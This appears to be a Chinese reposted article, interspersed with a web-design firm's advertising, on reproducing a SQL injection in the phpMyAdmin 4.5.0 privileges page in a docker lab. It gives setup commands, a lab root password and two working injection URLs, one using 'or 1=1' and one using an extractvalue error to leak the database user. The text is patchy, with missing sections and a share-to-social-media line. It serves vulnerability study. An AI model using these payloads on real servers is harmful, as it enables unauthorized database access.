如何进行phpMyAdmin后台SQL注入
如何进行phpMyAdmin后台SQL注入,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
成都创新互联是一家专业提供万安企业网站建设,专注与网站设计制作、成都网站制作、H5响应式网站、小程序制作等业务。10年已为万安众多企业、政府机构等服务。创新互联专业网站建设公司优惠进行中。
用户界面SQL执行语句存在可控变量,且未对可控参数进行过滤直接拼接。可造成低权限用户越权执行SQL指令。
0x04 环境搭建
转发本文至朋友圈并截图发至公众号内
自行搭建:
本次复现环境使用PhpMyAdmin4.5.0版本,使用docker搭建。
git clone https://github.com/Paper-Pen/TLSHUB.gitcd TLSHUB/phpAdmin/docker-compose up -ddocker ps
数据库账号密码root/li9hu
0x05 漏洞复现
http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server
http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server
0x07 修复方式
更新官方最新补丁
看完上述内容,你们掌握如何进行phpMyAdmin后台SQL注入的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注创新互联行业资讯频道,感谢各位的阅读!
当前名称:如何进行phpMyAdmin后台SQL注入
文章网址:http://scjbc.cn/article/gddsec.html